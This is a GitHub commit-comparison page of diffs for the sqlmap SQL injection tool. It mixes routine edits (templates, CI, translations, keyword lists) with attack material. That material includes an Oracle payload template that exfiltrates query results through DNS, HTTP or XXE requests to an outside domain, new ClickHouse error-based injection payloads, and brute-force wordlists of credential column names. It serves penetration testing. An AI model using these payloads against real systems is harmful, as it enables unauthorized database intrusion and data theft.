mirror of
https://github.com/sqlmapproject/sqlmap.git
synced 2025-12-06 20:51:31 +00:00
Compare commits
60 Commits
| Author | SHA1 | Date | |
|---|---|---|---|
|
|
bb48dd037f | ||
|
|
df388b2150 | ||
|
|
66cc6ae55c | ||
|
|
322d80c0cf | ||
|
|
1230e57fca | ||
|
|
ee15749ac4 | ||
|
|
8466a89ed3 | ||
|
|
acc7b16845 | ||
|
|
48c967c01d | ||
|
|
d28a66a340 | ||
|
|
30b43eccab | ||
|
|
290a8e7119 | ||
|
|
cf5e2aa7ef | ||
|
|
8bc2ace094 | ||
|
|
e1043173d7 | ||
|
|
12c472cef5 | ||
|
|
037a07ddde | ||
|
|
0e8940b0be | ||
|
|
3ad6727d0c | ||
|
|
4191b06f58 | ||
|
|
60bb973c11 | ||
|
|
0fba9b13b3 | ||
|
|
17688f6711 | ||
|
|
3b3c2a5d04 | ||
|
|
4f7614412f | ||
|
|
4efb3ea840 | ||
|
|
c2bac51c4f | ||
|
|
7d763e224a | ||
|
|
4dd362cb2c | ||
|
|
077d58c5e9 | ||
|
|
257c4d1c88 | ||
|
|
ce30fa08d6 | ||
|
|
3ca2533c39 | ||
|
|
75bfebed9d | ||
|
|
3117730d84 | ||
|
|
323af987ed | ||
|
|
80dc67f85a | ||
|
|
ca2f094e4a | ||
|
|
3aa6692b82 | ||
|
|
aabfcbc3e1 | ||
|
|
d42174e8a0 | ||
|
|
a1bf89d31e | ||
|
|
99ea44c7b3 | ||
|
|
abc092959f | ||
|
|
d5547d908c | ||
|
|
25fe5dce21 | ||
|
|
1f82d9587a | ||
|
|
15d9c8f9ed | ||
|
|
01310a47fd | ||
|
|
56177c3d2a | ||
|
|
c5d7c542a2 | ||
|
|
4357b0087d | ||
|
|
d3bfe59401 | ||
|
|
9eb970e7c7 | ||
|
|
46495f70f8 | ||
|
|
30ba167cc1 | ||
|
|
d7180d38c4 | ||
|
|
b1aaac5ba2 | ||
|
|
8962e152ac | ||
|
|
c58383e684 |
8
.github/ISSUE_TEMPLATE/bug_report.md
vendored
8
.github/ISSUE_TEMPLATE/bug_report.md
vendored
@@ -21,10 +21,10 @@ A clear and concise description of what you expected to happen.
|
||||
If applicable, add screenshots to help explain your problem.
|
||||
|
||||
**Running environment:**
|
||||
- sqlmap version [e.g. 1.3.5.93#dev]
|
||||
- Installation method [e.g. git]
|
||||
- Operating system: [e.g. Microsoft Windows 10]
|
||||
- Python version [e.g. 3.5.2]
|
||||
- sqlmap version [e.g. 1.7.2.12#dev]
|
||||
- Installation method [e.g. pip]
|
||||
- Operating system: [e.g. Microsoft Windows 11]
|
||||
- Python version [e.g. 3.11.2]
|
||||
|
||||
**Target details:**
|
||||
- DBMS [e.g. Microsoft SQL Server]
|
||||
|
||||
2
.github/workflows/tests.yml
vendored
2
.github/workflows/tests.yml
vendored
@@ -10,7 +10,7 @@ jobs:
|
||||
strategy:
|
||||
matrix:
|
||||
os: [ubuntu-latest, macos-latest, windows-latest]
|
||||
python-version: [ '2.x', '3.11', 'pypy-2.7', 'pypy-3.7' ]
|
||||
python-version: [ '3.11', 'pypy-2.7', 'pypy-3.7' ]
|
||||
steps:
|
||||
- uses: actions/checkout@v2
|
||||
- name: Set up Python
|
||||
|
||||
@@ -69,7 +69,8 @@ Translations
|
||||
* [Portuguese](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-pt-BR.md)
|
||||
* [Russian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-ru-RUS.md)
|
||||
* [Serbian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-rs-RS.md)
|
||||
* [Slovak](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-sk-SK.md)
|
||||
* [Spanish](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-es-MX.md)
|
||||
* [Turkish](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-tr-TR.md)
|
||||
* [Ukrainian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-uk-UA.md)
|
||||
* [Vietnamese](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-vi-VN.md)
|
||||
* [Vietnamese](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-vi-VN.md)
|
||||
@@ -1,2 +1,3 @@
|
||||
SELECT UTL_INADDR.GET_HOST_ADDRESS('%PREFIX%.'||(%QUERY%)||'.%SUFFIX%.%DOMAIN%') FROM DUAL
|
||||
# or SELECT UTL_HTTP.REQUEST('http://%PREFIX%.'||(%QUERY%)||'.%SUFFIX%.%DOMAIN%') FROM DUAL
|
||||
# or (CVE-2014-6577) SELECT EXTRACTVALUE(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://%PREFIX%.'||(%QUERY%)||'.%SUFFIX%.%DOMAIN%/"> %remote;]>'),'/l') FROM dual
|
||||
|
||||
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
@@ -1844,6 +1844,10 @@ banner_id
|
||||
error
|
||||
language_id
|
||||
val
|
||||
parol
|
||||
familiya
|
||||
imya
|
||||
otchestvo
|
||||
|
||||
# site:jp
|
||||
|
||||
@@ -2731,6 +2735,34 @@ ssn
|
||||
account
|
||||
confidential
|
||||
|
||||
# site:nl
|
||||
|
||||
naam
|
||||
straat
|
||||
gemeente
|
||||
beschrijving
|
||||
id_gebruiker
|
||||
gebruiker_id
|
||||
gebruikersnaam
|
||||
wachtwoord
|
||||
telefoon
|
||||
voornaam
|
||||
achternaam
|
||||
geslacht
|
||||
huisnummer
|
||||
gemeente
|
||||
leeftijd
|
||||
|
||||
# site:cn
|
||||
|
||||
yonghuming
|
||||
mima
|
||||
xingming
|
||||
xingbie
|
||||
touxiang
|
||||
youxiang
|
||||
shouji
|
||||
|
||||
# Misc
|
||||
|
||||
u_pass
|
||||
|
||||
@@ -399,6 +399,7 @@ XDBWEBSERVICES
|
||||
|
||||
# MySQL
|
||||
information_schema
|
||||
performance_schema
|
||||
mysql
|
||||
phpmyadmin
|
||||
|
||||
|
||||
@@ -3578,3 +3578,11 @@ users
|
||||
user_usergroup_map
|
||||
viewlevels
|
||||
weblinks
|
||||
|
||||
# site:nl
|
||||
|
||||
gebruikers
|
||||
|
||||
# site:cn
|
||||
|
||||
yonghu
|
||||
|
||||
@@ -452,6 +452,763 @@ WRITEXOR
|
||||
YEAR_MONTH
|
||||
ZEROFILL
|
||||
|
||||
# MySQL 8.0 keywords (reference: https://dev.mysql.com/doc/refman/8.0/en/keywords.html)
|
||||
|
||||
ACCESSIBLE
|
||||
ACCOUNT
|
||||
ACTION
|
||||
ACTIVE
|
||||
ADD
|
||||
ADMIN
|
||||
AFTER
|
||||
AGAINST
|
||||
AGGREGATE
|
||||
ALGORITHM
|
||||
ALL
|
||||
ALTER
|
||||
ALWAYS
|
||||
ANALYSE
|
||||
ANALYZE
|
||||
AND
|
||||
ANY
|
||||
ARRAY
|
||||
AS
|
||||
ASC
|
||||
ASCII
|
||||
ASENSITIVE
|
||||
AT
|
||||
ATTRIBUTE
|
||||
AUTHENTICATION
|
||||
AUTOEXTEND_SIZE
|
||||
AUTO_INCREMENT
|
||||
AVG
|
||||
AVG_ROW_LENGTH
|
||||
BACKUP
|
||||
BEFORE
|
||||
BEGIN
|
||||
BETWEEN
|
||||
BIGINT
|
||||
BINARY
|
||||
BINLOG
|
||||
BIT
|
||||
BLOB
|
||||
BLOCK
|
||||
BOOL
|
||||
BOOLEAN
|
||||
BOTH
|
||||
BTREE
|
||||
BUCKETS
|
||||
BULK
|
||||
BY
|
||||
BYTE
|
||||
CACHE
|
||||
CALL
|
||||
CASCADE
|
||||
CASCADED
|
||||
CASE
|
||||
CATALOG_NAME
|
||||
CHAIN
|
||||
CHALLENGE_RESPONSE
|
||||
CHANGE
|
||||
CHANGED
|
||||
CHANNEL
|
||||
CHAR
|
||||
CHARACTER
|
||||
CHARSET
|
||||
CHECK
|
||||
CHECKSUM
|
||||
CIPHER
|
||||
CLASS_ORIGIN
|
||||
CLIENT
|
||||
CLONE
|
||||
CLOSE
|
||||
COALESCE
|
||||
CODE
|
||||
COLLATE
|
||||
COLLATION
|
||||
COLUMN
|
||||
COLUMNS
|
||||
COLUMN_FORMAT
|
||||
COLUMN_NAME
|
||||
COMMENT
|
||||
COMMIT
|
||||
COMMITTED
|
||||
COMPACT
|
||||
COMPLETION
|
||||
COMPONENT
|
||||
COMPRESSED
|
||||
COMPRESSION
|
||||
CONCURRENT
|
||||
CONDITION
|
||||
CONNECTION
|
||||
CONSISTENT
|
||||
CONSTRAINT
|
||||
CONSTRAINT_CATALOG
|
||||
CONSTRAINT_NAME
|
||||
CONSTRAINT_SCHEMA
|
||||
CONTAINS
|
||||
CONTEXT
|
||||
CONTINUE
|
||||
CONVERT
|
||||
CPU
|
||||
CREATE
|
||||
CROSS
|
||||
CUBE
|
||||
CUME_DIST
|
||||
CURRENT
|
||||
CURRENT_DATE
|
||||
CURRENT_TIME
|
||||
CURRENT_TIMESTAMP
|
||||
CURRENT_USER
|
||||
CURSOR
|
||||
CURSOR_NAME
|
||||
DATA
|
||||
DATABASE
|
||||
DATABASES
|
||||
DATAFILE
|
||||
DATE
|
||||
DATETIME
|
||||
DAY
|
||||
DAY_HOUR
|
||||
DAY_MICROSECOND
|
||||
DAY_MINUTE
|
||||
DAY_SECOND
|
||||
DEALLOCATE
|
||||
DEC
|
||||
DECIMAL
|
||||
DECLARE
|
||||
DEFAULT
|
||||
DEFAULT_AUTH
|
||||
DEFINER
|
||||
DEFINITION
|
||||
DELAYED
|
||||
DELAY_KEY_WRITE
|
||||
DELETE
|
||||
DENSE_RANK
|
||||
DESC
|
||||
DESCRIBE
|
||||
DESCRIPTION
|
||||
DES_KEY_FILE
|
||||
DETERMINISTIC
|
||||
DIAGNOSTICS
|
||||
DIRECTORY
|
||||
DISABLE
|
||||
DISCARD
|
||||
DISK
|
||||
DISTINCT
|
||||
DISTINCTROW
|
||||
DIV
|
||||
DO
|
||||
DOUBLE
|
||||
DROP
|
||||
DUAL
|
||||
DUMPFILE
|
||||
DUPLICATE
|
||||
DYNAMIC
|
||||
EACH
|
||||
ELSE
|
||||
ELSEIF
|
||||
EMPTY
|
||||
ENABLE
|
||||
ENCLOSED
|
||||
ENCRYPTION
|
||||
END
|
||||
ENDS
|
||||
ENFORCED
|
||||
ENGINE
|
||||
ENGINES
|
||||
ENGINE_ATTRIBUTE
|
||||
ENUM
|
||||
ERROR
|
||||
ERRORS
|
||||
ESCAPE
|
||||
ESCAPED
|
||||
EVENT
|
||||
EVENTS
|
||||
EVERY
|
||||
EXCEPT
|
||||
EXCHANGE
|
||||
EXCLUDE
|
||||
EXECUTE
|
||||
EXISTS
|
||||
EXIT
|
||||
EXPANSION
|
||||
EXPIRE
|
||||
EXPLAIN
|
||||
EXPORT
|
||||
EXTENDED
|
||||
EXTENT_SIZE
|
||||
FACTOR
|
||||
FAILED_LOGIN_ATTEMPTS
|
||||
FALSE
|
||||
FAST
|
||||
FAULTS
|
||||
FETCH
|
||||
FIELDS
|
||||
FILE
|
||||
FILE_BLOCK_SIZE
|
||||
FILTER
|
||||
FINISH
|
||||
FIRST
|
||||
FIRST_VALUE
|
||||
FIXED
|
||||
FLOAT
|
||||
FLOAT4
|
||||
FLOAT8
|
||||
FLUSH
|
||||
FOLLOWING
|
||||
FOLLOWS
|
||||
FOR
|
||||
FORCE
|
||||
FOREIGN
|
||||
FORMAT
|
||||
FOUND
|
||||
FROM
|
||||
FULL
|
||||
FULLTEXT
|
||||
FUNCTION
|
||||
GENERAL
|
||||
GENERATE
|
||||
GENERATED
|
||||
GEOMCOLLECTION
|
||||
GEOMETRY
|
||||
GEOMETRYCOLLECTION
|
||||
GET
|
||||
GET_FORMAT
|
||||
GET_MASTER_PUBLIC_KEY
|
||||
GET_SOURCE_PUBLIC_KEY
|
||||
GLOBAL
|
||||
GRANT
|
||||
GRANTS
|
||||
GROUP
|
||||
GROUPING
|
||||
GROUPS
|
||||
GROUP_REPLICATION
|
||||
GTID_ONLY
|
||||
HANDLER
|
||||
HASH
|
||||
HAVING
|
||||
HELP
|
||||
HIGH_PRIORITY
|
||||
HISTOGRAM
|
||||
HISTORY
|
||||
HOST
|
||||
HOSTS
|
||||
HOUR
|
||||
HOUR_MICROSECOND
|
||||
HOUR_MINUTE
|
||||
HOUR_SECOND
|
||||
IDENTIFIED
|
||||
IF
|
||||
IGNORE
|
||||
IGNORE_SERVER_IDS
|
||||
IMPORT
|
||||
IN
|
||||
INACTIVE
|
||||
INDEX
|
||||
INDEXES
|
||||
INFILE
|
||||
INITIAL
|
||||
INITIAL_SIZE
|
||||
INITIATE
|
||||
INNER
|
||||
INOUT
|
||||
INSENSITIVE
|
||||
INSERT
|
||||
INSERT_METHOD
|
||||
INSTALL
|
||||
INSTANCE
|
||||
INT
|
||||
INT1
|
||||
INT2
|
||||
INT3
|
||||
INT4
|
||||
INT8
|
||||
INTEGER
|
||||
INTERSECT
|
||||
INTERVAL
|
||||
INTO
|
||||
INVISIBLE
|
||||
INVOKER
|
||||
IO
|
||||
IO_AFTER_GTIDS
|
||||
IO_BEFORE_GTIDS
|
||||
IO_THREAD
|
||||
IPC
|
||||
IS
|
||||
ISOLATION
|
||||
ISSUER
|
||||
ITERATE
|
||||
JOIN
|
||||
JSON
|
||||
JSON_TABLE
|
||||
JSON_VALUE
|
||||
KEY
|
||||
KEYRING
|
||||
KEYS
|
||||
KEY_BLOCK_SIZE
|
||||
KILL
|
||||
LAG
|
||||
LANGUAGE
|
||||
LAST
|
||||
LAST_VALUE
|
||||
LATERAL
|
||||
LEAD
|
||||
LEADING
|
||||
LEAVE
|
||||
LEAVES
|
||||
LEFT
|
||||
LESS
|
||||
LEVEL
|
||||
LIKE
|
||||
LIMIT
|
||||
LINEAR
|
||||
LINES
|
||||
LINESTRING
|
||||
LIST
|
||||
LOAD
|
||||
LOCAL
|
||||
LOCALTIME
|
||||
LOCALTIMESTAMP
|
||||
LOCK
|
||||
LOCKED
|
||||
LOCKS
|
||||
LOGFILE
|
||||
LOGS
|
||||
LONG
|
||||
LONGBLOB
|
||||
LONGTEXT
|
||||
LOOP
|
||||
LOW_PRIORITY
|
||||
MASTER
|
||||
MASTER_AUTO_POSITION
|
||||
MASTER_BIND
|
||||
MASTER_COMPRESSION_ALGORITHMS
|
||||
MASTER_CONNECT_RETRY
|
||||
MASTER_DELAY
|
||||
MASTER_HEARTBEAT_PERIOD
|
||||
MASTER_HOST
|
||||
MASTER_LOG_FILE
|
||||
MASTER_LOG_POS
|
||||
MASTER_PASSWORD
|
||||
MASTER_PORT
|
||||
MASTER_PUBLIC_KEY_PATH
|
||||
MASTER_RETRY_COUNT
|
||||
MASTER_SERVER_ID
|
||||
MASTER_SSL
|
||||
MASTER_SSL_CA
|
||||
MASTER_SSL_CAPATH
|
||||
MASTER_SSL_CERT
|
||||
MASTER_SSL_CIPHER
|
||||
MASTER_SSL_CRL
|
||||
MASTER_SSL_CRLPATH
|
||||
MASTER_SSL_KEY
|
||||
MASTER_SSL_VERIFY_SERVER_CERT
|
||||
MASTER_TLS_CIPHERSUITES
|
||||
MASTER_TLS_VERSION
|
||||
MASTER_USER
|
||||
MASTER_ZSTD_COMPRESSION_LEVEL
|
||||
MATCH
|
||||
MAXVALUE
|
||||
MAX_CONNECTIONS_PER_HOUR
|
||||
MAX_QUERIES_PER_HOUR
|
||||
MAX_ROWS
|
||||
MAX_SIZE
|
||||
MAX_UPDATES_PER_HOUR
|
||||
MAX_USER_CONNECTIONS
|
||||
MEDIUM
|
||||
MEDIUMBLOB
|
||||
MEDIUMINT
|
||||
MEDIUMTEXT
|
||||
MEMBER
|
||||
MEMORY
|
||||
MERGE
|
||||
MESSAGE_TEXT
|
||||
MICROSECOND
|
||||
MIDDLEINT
|
||||
MIGRATE
|
||||
MINUTE
|
||||
MINUTE_MICROSECOND
|
||||
MINUTE_SECOND
|
||||
MIN_ROWS
|
||||
MOD
|
||||
MODE
|
||||
MODIFIES
|
||||
MODIFY
|
||||
MONTH
|
||||
MULTILINESTRING
|
||||
MULTIPOINT
|
||||
MULTIPOLYGON
|
||||
MUTEX
|
||||
MYSQL_ERRNO
|
||||
NAME
|
||||
NAMES
|
||||
NATIONAL
|
||||
NATURAL
|
||||
NCHAR
|
||||
NDB
|
||||
NDBCLUSTER
|
||||
NESTED
|
||||
NETWORK_NAMESPACE
|
||||
NEVER
|
||||
NEW
|
||||
NEXT
|
||||
NO
|
||||
NODEGROUP
|
||||
NONE
|
||||
NOT
|
||||
NOWAIT
|
||||
NO_WAIT
|
||||
NO_WRITE_TO_BINLOG
|
||||
NTH_VALUE
|
||||
NTILE
|
||||
NULL
|
||||
NULLS
|
||||
NUMBER
|
||||
NUMERIC
|
||||
NVARCHAR
|
||||
OF
|
||||
OFF
|
||||
OFFSET
|
||||
OJ
|
||||
OLD
|
||||
ON
|
||||
ONE
|
||||
ONLY
|
||||
OPEN
|
||||
OPTIMIZE
|
||||
OPTIMIZER_COSTS
|
||||
OPTION
|
||||
OPTIONAL
|
||||
OPTIONALLY
|
||||
OPTIONS
|
||||
OR
|
||||
ORDER
|
||||
ORDINALITY
|
||||
ORGANIZATION
|
||||
OTHERS
|
||||
OUT
|
||||
OUTER
|
||||
OUTFILE
|
||||
OVER
|
||||
OWNER
|
||||
PACK_KEYS
|
||||
PAGE
|
||||
PARSER
|
||||
PARTIAL
|
||||
PARTITION
|
||||
PARTITIONING
|
||||
PARTITIONS
|
||||
PASSWORD
|
||||
PASSWORD_LOCK_TIME
|
||||
PATH
|
||||
PERCENT_RANK
|
||||
PERSIST
|
||||
PERSIST_ONLY
|
||||
PHASE
|
||||
PLUGIN
|
||||
PLUGINS
|
||||
PLUGIN_DIR
|
||||
POINT
|
||||
POLYGON
|
||||
PORT
|
||||
PRECEDES
|
||||
PRECEDING
|
||||
PRECISION
|
||||
PREPARE
|
||||
PRESERVE
|
||||
PREV
|
||||
PRIMARY
|
||||
PRIVILEGES
|
||||
PRIVILEGE_CHECKS_USER
|
||||
PROCEDURE
|
||||
PROCESS
|
||||
PROCESSLIST
|
||||
PROFILE
|
||||
PROFILES
|
||||
PROXY
|
||||
PURGE
|
||||
QUARTER
|
||||
QUERY
|
||||
QUICK
|
||||
RANDOM
|
||||
RANGE
|
||||
RANK
|
||||
READ
|
||||
READS
|
||||
READ_ONLY
|
||||
READ_WRITE
|
||||
REAL
|
||||
REBUILD
|
||||
RECOVER
|
||||
RECURSIVE
|
||||
REDOFILE
|
||||
REDO_BUFFER_SIZE
|
||||
REDUNDANT
|
||||
REFERENCE
|
||||
REFERENCES
|
||||
REGEXP
|
||||
REGISTRATION
|
||||
RELAY
|
||||
RELAYLOG
|
||||
RELAY_LOG_FILE
|
||||
RELAY_LOG_POS
|
||||
RELAY_THREAD
|
||||
RELEASE
|
||||
RELOAD
|
||||
REMOTE
|
||||
REMOVE
|
||||
RENAME
|
||||
REORGANIZE
|
||||
REPAIR
|
||||
REPEAT
|
||||
REPEATABLE
|
||||
REPLACE
|
||||
REPLICA
|
||||
REPLICAS
|
||||
REPLICATE_DO_DB
|
||||
REPLICATE_DO_TABLE
|
||||
REPLICATE_IGNORE_DB
|
||||
REPLICATE_IGNORE_TABLE
|
||||
REPLICATE_REWRITE_DB
|
||||
REPLICATE_WILD_DO_TABLE
|
||||
REPLICATE_WILD_IGNORE_TABLE
|
||||
REPLICATION
|
||||
REQUIRE
|
||||
REQUIRE_ROW_FORMAT
|
||||
RESET
|
||||
RESIGNAL
|
||||
RESOURCE
|
||||
RESPECT
|
||||
RESTART
|
||||
RESTORE
|
||||
RESTRICT
|
||||
RESUME
|
||||
RETAIN
|
||||
RETURN
|
||||
RETURNED_SQLSTATE
|
||||
RETURNING
|
||||
RETURNS
|
||||
REUSE
|
||||
REVERSE
|
||||
REVOKE
|
||||
RIGHT
|
||||
RLIKE
|
||||
ROLE
|
||||
ROLLBACK
|
||||
ROLLUP
|
||||
ROTATE
|
||||
ROUTINE
|
||||
ROW
|
||||
ROWS
|
||||
ROW_COUNT
|
||||
ROW_FORMAT
|
||||
ROW_NUMBER
|
||||
RTREE
|
||||
SAVEPOINT
|
||||
SCHEDULE
|
||||
SCHEMA
|
||||
SCHEMAS
|
||||
SCHEMA_NAME
|
||||
SECOND
|
||||
SECONDARY
|
||||
SECONDARY_ENGINE
|
||||
SECONDARY_ENGINE_ATTRIBUTE
|
||||
SECONDARY_LOAD
|
||||
SECONDARY_UNLOAD
|
||||
SECOND_MICROSECOND
|
||||
SECURITY
|
||||
SELECT
|
||||
SENSITIVE
|
||||
SEPARATOR
|
||||
SERIAL
|
||||
SERIALIZABLE
|
||||
SERVER
|
||||
SESSION
|
||||
SET
|
||||
SHARE
|
||||
SHOW
|
||||
SHUTDOWN
|
||||
SIGNAL
|
||||
SIGNED
|
||||
SIMPLE
|
||||
SKIP
|
||||
SLAVE
|
||||
SLOW
|
||||
SMALLINT
|
||||
SNAPSHOT
|
||||
SOCKET
|
||||
SOME
|
||||
SONAME
|
||||
SOUNDS
|
||||
SOURCE
|
||||
SOURCE_AUTO_POSITION
|
||||
SOURCE_BIND
|
||||
SOURCE_COMPRESSION_ALGORITHMS
|
||||
SOURCE_CONNECT_RETRY
|
||||
SOURCE_DELAY
|
||||
SOURCE_HEARTBEAT_PERIOD
|
||||
SOURCE_HOST
|
||||
SOURCE_LOG_FILE
|
||||
SOURCE_LOG_POS
|
||||
SOURCE_PASSWORD
|
||||
SOURCE_PORT
|
||||
SOURCE_PUBLIC_KEY_PATH
|
||||
SOURCE_RETRY_COUNT
|
||||
SOURCE_SSL
|
||||
SOURCE_SSL_CA
|
||||
SOURCE_SSL_CAPATH
|
||||
SOURCE_SSL_CERT
|
||||
SOURCE_SSL_CIPHER
|
||||
SOURCE_SSL_CRL
|
||||
SOURCE_SSL_CRLPATH
|
||||
SOURCE_SSL_KEY
|
||||
SOURCE_SSL_VERIFY_SERVER_CERT
|
||||
SOURCE_TLS_CIPHERSUITES
|
||||
SOURCE_TLS_VERSION
|
||||
SOURCE_USER
|
||||
SOURCE_ZSTD_COMPRESSION_LEVEL
|
||||
SPATIAL
|
||||
SPECIFIC
|
||||
SQL
|
||||
SQLEXCEPTION
|
||||
SQLSTATE
|
||||
SQLWARNING
|
||||
SQL_AFTER_GTIDS
|
||||
SQL_AFTER_MTS_GAPS
|
||||
SQL_BEFORE_GTIDS
|
||||
SQL_BIG_RESULT
|
||||
SQL_BUFFER_RESULT
|
||||
SQL_CACHE
|
||||
SQL_CALC_FOUND_ROWS
|
||||
SQL_NO_CACHE
|
||||
SQL_SMALL_RESULT
|
||||
SQL_THREAD
|
||||
SQL_TSI_DAY
|
||||
SQL_TSI_HOUR
|
||||
SQL_TSI_MINUTE
|
||||
SQL_TSI_MONTH
|
||||
SQL_TSI_QUARTER
|
||||
SQL_TSI_SECOND
|
||||
SQL_TSI_WEEK
|
||||
SQL_TSI_YEAR
|
||||
SRID
|
||||
SSL
|
||||
STACKED
|
||||
START
|
||||
STARTING
|
||||
STARTS
|
||||
STATS_AUTO_RECALC
|
||||
STATS_PERSISTENT
|
||||
STATS_SAMPLE_PAGES
|
||||
STATUS
|
||||
STOP
|
||||
STORAGE
|
||||
STORED
|
||||
STRAIGHT_JOIN
|
||||
STREAM
|
||||
STRING
|
||||
SUBCLASS_ORIGIN
|
||||
SUBJECT
|
||||
SUBPARTITION
|
||||
SUBPARTITIONS
|
||||
SUPER
|
||||
SUSPEND
|
||||
SWAPS
|
||||
SWITCHES
|
||||
SYSTEM
|
||||
TABLE
|
||||
TABLES
|
||||
TABLESPACE
|
||||
TABLE_CHECKSUM
|
||||
TABLE_NAME
|
||||
TEMPORARY
|
||||
TEMPTABLE
|
||||
TERMINATED
|
||||
TEXT
|
||||
THAN
|
||||
THEN
|
||||
THREAD_PRIORITY
|
||||
TIES
|
||||
TIME
|
||||
TIMESTAMP
|
||||
TIMESTAMPADD
|
||||
TIMESTAMPDIFF
|
||||
TINYBLOB
|
||||
TINYINT
|
||||
TINYTEXT
|
||||
TLS
|
||||
TO
|
||||
TRAILING
|
||||
TRANSACTION
|
||||
TRIGGER
|
||||
TRIGGERS
|
||||
TRUE
|
||||
TRUNCATE
|
||||
TYPE
|
||||
TYPES
|
||||
UNBOUNDED
|
||||
UNCOMMITTED
|
||||
UNDEFINED
|
||||
UNDO
|
||||
UNDOFILE
|
||||
UNDO_BUFFER_SIZE
|
||||
UNICODE
|
||||
UNINSTALL
|
||||
UNION
|
||||
UNIQUE
|
||||
UNKNOWN
|
||||
UNLOCK
|
||||
UNREGISTER
|
||||
UNSIGNED
|
||||
UNTIL
|
||||
UPDATE
|
||||
UPGRADE
|
||||
URL
|
||||
USAGE
|
||||
USE
|
||||
USER
|
||||
USER_RESOURCES
|
||||
USE_FRM
|
||||
USING
|
||||
UTC_DATE
|
||||
UTC_TIME
|
||||
UTC_TIMESTAMP
|
||||
VALIDATION
|
||||
VALUE
|
||||
VALUES
|
||||
VARBINARY
|
||||
VARCHAR
|
||||
VARCHARACTER
|
||||
VARIABLES
|
||||
VARYING
|
||||
VCPU
|
||||
VIEW
|
||||
VIRTUAL
|
||||
VISIBLE
|
||||
WAIT
|
||||
WARNINGS
|
||||
WEEK
|
||||
WEIGHT_STRING
|
||||
WHEN
|
||||
WHERE
|
||||
WHILE
|
||||
WINDOW
|
||||
WITH
|
||||
WITHOUT
|
||||
WORK
|
||||
WRAPPER
|
||||
WRITE
|
||||
X509
|
||||
XA
|
||||
XID
|
||||
XML
|
||||
XOR
|
||||
YEAR
|
||||
YEAR_MONTH
|
||||
ZEROFILL
|
||||
ZONE
|
||||
|
||||
# PostgreSQL|SQL:2016|SQL:2011 reserved words (reference: https://www.postgresql.org/docs/current/sql-keywords-appendix.html)
|
||||
|
||||
ABS
|
||||
@@ -872,3 +1629,8 @@ XMLTABLE
|
||||
XMLTEXT
|
||||
XMLVALIDATE
|
||||
YEAR
|
||||
|
||||
# Misc
|
||||
|
||||
ORD
|
||||
MID
|
||||
|
||||
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
@@ -211,6 +211,11 @@
|
||||
<error regexp="Syntax error,[^\n]+assumed to mean"/>
|
||||
</dbms>
|
||||
|
||||
<dbms value="ClickHouse">
|
||||
<error regexp="Code: \d+. DB::Exception:"/>
|
||||
<error regexp="Syntax error: failed at position \d+"/>
|
||||
</dbms>
|
||||
|
||||
<dbms value="CrateDB">
|
||||
<error regexp="io\.crate\.client\.jdbc"/>
|
||||
</dbms>
|
||||
|
||||
@@ -838,7 +838,7 @@
|
||||
<title>IBM DB2 OR error-based - WHERE or HAVING clause</title>
|
||||
<stype>2</stype>
|
||||
<level>4</level>
|
||||
<risk>1</risk>
|
||||
<risk>3</risk>
|
||||
<clause>1</clause>
|
||||
<where>1</where>
|
||||
<vector>OR [RANDNUM]=RAISE_ERROR('70001','[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')</vector>
|
||||
@@ -853,6 +853,44 @@
|
||||
</details>
|
||||
</test>
|
||||
|
||||
<test>
|
||||
<title>ClickHouse AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause</title>
|
||||
<stype>2</stype>
|
||||
<level>3</level>
|
||||
<risk>1</risk>
|
||||
<clause>1,2,3,9</clause>
|
||||
<where>1</where>
|
||||
<vector>AND [RANDNUM]=('[DELIMITER_START]'||CAST(([QUERY]) AS String)||'[DELIMITER_STOP]')</vector>
|
||||
<request>
|
||||
<payload>AND [RANDNUM]=('[DELIMITER_START]'||(CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END)||'[DELIMITER_STOP]')</payload>
|
||||
</request>
|
||||
<response>
|
||||
<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>
|
||||
</response>
|
||||
<details>
|
||||
<dbms>ClickHouse</dbms>
|
||||
</details>
|
||||
</test>
|
||||
|
||||
<test>
|
||||
<title>ClickHouse OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause</title>
|
||||
<stype>2</stype>
|
||||
<level>4</level>
|
||||
<risk>3</risk>
|
||||
<clause>1,2,3,9</clause>
|
||||
<where>1</where>
|
||||
<vector>OR [RANDNUM]=('[DELIMITER_START]'||CAST(([QUERY]) AS String)||'[DELIMITER_STOP]')</vector>
|
||||
<request>
|
||||
<payload>OR [RANDNUM]=('[DELIMITER_START]'||(CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END)||'[DELIMITER_STOP]')</payload>
|
||||
</request>
|
||||
<response>
|
||||
<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>
|
||||
</response>
|
||||
<details>
|
||||
<dbms>ClickHouse</dbms>
|
||||
</details>
|
||||
</test>
|
||||
|
||||
<!--
|
||||
TODO: if possible, add payload for SQLite, Microsoft Access,
|
||||
and SAP MaxDB - no known techniques at this time
|
||||
|
||||
@@ -133,5 +133,25 @@
|
||||
<dbms>Firebird</dbms>
|
||||
</details>
|
||||
</test>
|
||||
|
||||
